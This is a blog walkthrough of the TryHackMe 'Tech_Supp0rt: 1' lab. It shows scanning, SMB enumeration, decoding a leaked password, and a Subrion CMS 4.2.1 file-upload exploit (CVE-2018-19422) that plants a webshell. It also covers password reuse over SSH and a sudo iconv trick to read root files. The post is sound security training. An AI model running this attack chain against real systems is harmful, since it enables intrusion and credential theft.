DEV Community

Cover image for TryHackMe Tech_Supp0rt: 1 Walkthrough
Krishna
Krishna

Posted on

TryHackMe Tech_Supp0rt: 1 Walkthrough

#beginners #security #tryhackme #ctf

TryHackMe Page for the Machine => https://tryhackme.com/room/techsupp0rt1

Enum

rustscan nmap 

rustscan -a 10.10.26.146 -- -A PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtST3F95eem6k4V02TcUi7/Qtn3WvJGNfqpbE+7EVuN2etoFpihgP5LFK2i/EDbeIAiEPALjtKy3gFMEJ5QDCkglBYt3gUbYv29TQBdx+LZQ8Kjry7W+KCKXhkKJEVnkT5cN6lYZIGAkIAVXacZ/YxWjj+ruSAx07fnNLMkqsMR9VA+8w0L2BsXhzYAwCdWrfRf8CE1UEdJy6WIxRsxIYOk25o9R44KXOWT2F8pP2tFbNcvUMlUY6jGHmXgrIEwDiBHuwd3uG5cVVmxJCCSY6Ygr9Aa12nXmUE5QJE9lisYIPUn9IjbRFb2d2hZE2jQHq3WCGdAls2Bwnn7Rgc7J09 | 256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBClT+wif/EERxNcaeTiny8IrQ5Qn6uEM7QxRlouee7KWHrHXomCB/Bq4gJ95Lx5sRPQJhGOZMLZyQaKPTIaILNQ= | 256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDolvqv0mvkrpBMhzpvuXHjJlRv/vpYhMabXxhkBxOwz 80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn syn-ack Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: -1h49m59s, deviation: 3h10m30s, median: 0s | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 18468/tcp): CLEAN (Couldn't connect) | Check 2 (port 42676/tcp): CLEAN (Couldn't connect) | Check 3 (port 46039/udp): CLEAN (Timeout) | Check 4 (port 2861/udp): CLEAN (Failed to receive data) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: techsupport | NetBIOS computer name: TECHSUPPORT\x00 | Domain name: \x00 | FQDN: techsupport |_ System time: 2022-11-04T17:24:12+05:30 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2022-11-04T11:54:12 |_ start_date: N/A
Enter fullscreen mode Exit fullscreen mode

SMB Server Enum 

└─$ crackmapexec smb techsupport.thm -u '' -p '' SMB techsupport.thm 445 TECHSUPPORT [*] Windows 6.1 (name:TECHSUPPORT) (domain:) (signing:False) (SMBv1:True) SMB techsupport.thm 445 TECHSUPPORT [+] \: └─$ crackmapexec smb techsupport.thm -u 'a' -p '' --shares SMB techsupport.thm 445 TECHSUPPORT [*] Windows 6.1 (name:TECHSUPPORT) (domain:) (signing:False) (SMBv1:True) SMB techsupport.thm 445 TECHSUPPORT [+] \a: SMB techsupport.thm 445 TECHSUPPORT [+] Enumerated shares SMB techsupport.thm 445 TECHSUPPORT Share Permissions Remark SMB techsupport.thm 445 TECHSUPPORT ----- ----------- ------ SMB techsupport.thm 445 TECHSUPPORT print$  Printer Drivers SMB techsupport.thm 445 TECHSUPPORT websvr READ SMB techsupport.thm 445 TECHSUPPORT IPC$  IPC Service (TechSupport server (Samba, Ubuntu)) ┌──(kali㉿kali)-[~/Documents/ctf/thm_easy_techsupport] └─$ smbclient //techsupport.thm/websvr Password for [WORKGROUP\kali]: Try "help" to get a list of possible commands. smb: \> PROMPT OFF smb: \> RECURSE ON smb: \> mget * getting file \enter.txt of size 273 as enter.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec) smb: \> exit ┌──(kali㉿kali)-[~/Documents/ctf/thm_easy_techsupport] └─$ ll total 4 -rw-r--r-- 1 kali kali 273 Nov 4 08:58 enter.txt ┌──(kali㉿kali)-[~/Documents/ctf/thm_easy_techsupport] └─$ cat enter.txt GOALS ===== 1)Make fake popup and host it online on Digital Ocean server 2)Fix subrion site, /subrion doesn't work, edit from panel 3)Edit wordpress website IMP === Subrion creds |->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula] Wordpress creds |->
Enter fullscreen mode Exit fullscreen mode

Trying to access this /subrion folder. Did not work in the browser. So tried accessing it via curl

└─$ curl -v http://techsupport.thm/subrion/ * Trying 10.10.26.146:80... * Connected to techsupport.thm (10.10.26.146) port 80 (#0) > GET /subrion/ HTTP/1.1 > Host: techsupport.thm > User-Agent: curl/7.85.0 > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 302 Found < Date: Fri, 04 Nov 2022 13:04:03 GMT < Server: Apache/2.4.18 (Ubuntu) < Set-Cookie: INTELLI_06c8042c3d=0knjt7oo4bvcpfd14hns363f0i; path=/ < Expires: Thu, 19 Nov 1981 08:52:00 GMT < Cache-Control: no-store, no-cache, must-revalidate < Pragma: no-cache < Set-Cookie: INTELLI_06c8042c3d=0knjt7oo4bvcpfd14hns363f0i; expires=Fri, 04-Nov-2022 13:34:03 GMT; Max-Age=1800; path=/ < Location: http://10.0.2.15/subrion/subrion/ < Content-Length: 0 < Content-Type: text/html; charset=UTF-8 < * Connection #0 to host techsupport.thm left intact
Enter fullscreen mode Exit fullscreen mode

No wonder its not working. There is a 302 redirect to a strange IP. Also a strange cookie value.

The enter.txt mentions a panel, which I am guessing is some kind of CMS admin panel.

Let's try and find it. Modifying my usual ffuf statement to remove the -r option to ensure redirects are not followed. Also filtering for 302 status codes. Regarding the 302, the server seems to be configured to return a 302 redirect to 10.0.2.15, when we try to access a subfolder of subrion, which will make fuzzing a pain in the behind if we dont handle it properly.

Example

└─$ curl -v http://techsupport.thm/subrion/whatintheworld/ * Trying 10.10.26.146:80... * Connected to techsupport.thm (10.10.26.146) port 80 (#0) > GET /subrion/whatintheworld/ HTTP/1.1 > Host: techsupport.thm > User-Agent: curl/7.85.0 > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 302 Found < Date: Fri, 04 Nov 2022 13:21:48 GMT < Server: Apache/2.4.18 (Ubuntu) < Set-Cookie: INTELLI_06c8042c3d=0e7gu6bkk63fuvtkv8t5rfk5sr; path=/ < Expires: Thu, 19 Nov 1981 08:52:00 GMT < Cache-Control: no-store, no-cache, must-revalidate < Pragma: no-cache < Set-Cookie: INTELLI_06c8042c3d=0e7gu6bkk63fuvtkv8t5rfk5sr; expires=Fri, 04-Nov-2022 13:51:48 GMT; Max-Age=1800; path=/ < Location: http://10.0.2.15/subrion/subrion/whatintheworld/ < Content-Length: 0 < Content-Type: text/html; charset=UTF-8 < * Connection #0 to host techsupport.thm left intact
Enter fullscreen mode Exit fullscreen mode

Note: Also removed the -recursion option. There is a / after FUZZ. If we don't add this, the server returns a 301 with the slash added. But for the recursion option to work, the FUZZ keyword needs to be the last thing on the URL string.

Now, let's fuzz!

└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u http://techsupport.thm/subrion/FUZZ/ -o ffuf/raftLarge -of html -ic -c -e .txt,.html,.bak,.gz,.zip,.php,.db,.sql,.tar.gz -sf -t 50 -fc 302 install [Status: 200, Size: 13125, Words: 6273, Lines: 212, Duration: 311ms] updates [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 196ms] panel.php [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 792ms] panel.sql [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 792ms] panel.bak [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 792ms] panel.db [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 792ms] panel [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 793ms] panel.html [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 793ms] panel.zip [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 793ms] panel.txt [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 793ms] panel.gz [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 794ms]
Enter fullscreen mode Exit fullscreen mode

Trying to decode password in Cyberchef.
https://gchq.github.io/CyberChef/#recipe=From_Base58('123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz',false)From_Base32('A-Z2-7%3D',false)From_Base64('A-Za-z0-9%2B/%3D',true,false)

Subrion login creds
| user | pass |
| -- | -- |
| admin | CENSORED |

Subrion Admin Portal Enum

After login.

Image description

Subrion Version 4.2.1 is installed. Searching for anything regarding this version on ExploitDB, we get https://www.exploit-db.com/exploits/49876. An arbitrary file upload exploit.

Let's try and use it.

Uploading a reverse shell using CVE-2018-19422

Don't forget to add the slash after panel in the URL when running the exploit.

└─$ python3 49876.py -u http://techsupport.thm/subrion/panel/ --user=admin --passw=CENSORED [+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 [+] Trying to connect to: http://techsupport.thm/subrion/panel/ [+] Success! [+] Got CSRF token: 7LJC4WPSmVW99qpA8XKWZZPAUDIcilg43wfRfpQi [+] Trying to log in... [+] Login Successful! [+] Generating random name for Webshell... [+] Generated webshell name: ipmrjrdahkbtipn [+] Trying to Upload Webshell.. [+] Upload Success... Webshell path: http://techsupport.thm/subrion/panel/uploads/ipmrjrdahkbtipn.phar $
Enter fullscreen mode Exit fullscreen mode

The above exploit gives us a command shell. Let's pivot to a full featured reverse shell by running a Python3 reverse shell command.
Here are some good examples => https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python

With this shell, we can get a foothold on the machine.

Foothold

wp-config.php

/** The name of the database for WordPress */ define( 'DB_NAME', 'wpdb' ); /** MySQL database username */ define( 'DB_USER', 'support' ); /** MySQL database password */ define( 'DB_PASSWORD', 'CENSORED' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost' ); /** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The Database Collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' );
Enter fullscreen mode Exit fullscreen mode

Trying to do an SSH login to the scamsite user(which we found in the home folder) using the above password?

Success!! We now have a proper login shell.

Let's try for privesc

Privesc 

scamsite@TechSupport:~$ sudo -l Matching Defaults entries for scamsite on TechSupport: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User scamsite may run the following commands on TechSupport: (ALL) NOPASSWD: /usr/bin/iconv
Enter fullscreen mode Exit fullscreen mode

Looks like we have sudo permissions for one command. Let's see if we can leverage that for privesc.

Yes we can => https://gtfobins.github.io/gtfobins/iconv/#sudo

scamsite@TechSupport:~$ sudo /usr/bin/iconv 8859_1 -t 8859_1 /root/root.txt /usr/bin/iconv: cannot open input file `8859_1': No such file or directory CENSORED -
Enter fullscreen mode Exit fullscreen mode

DONE!!

Also follow me on Mastodon.

Top comments (0)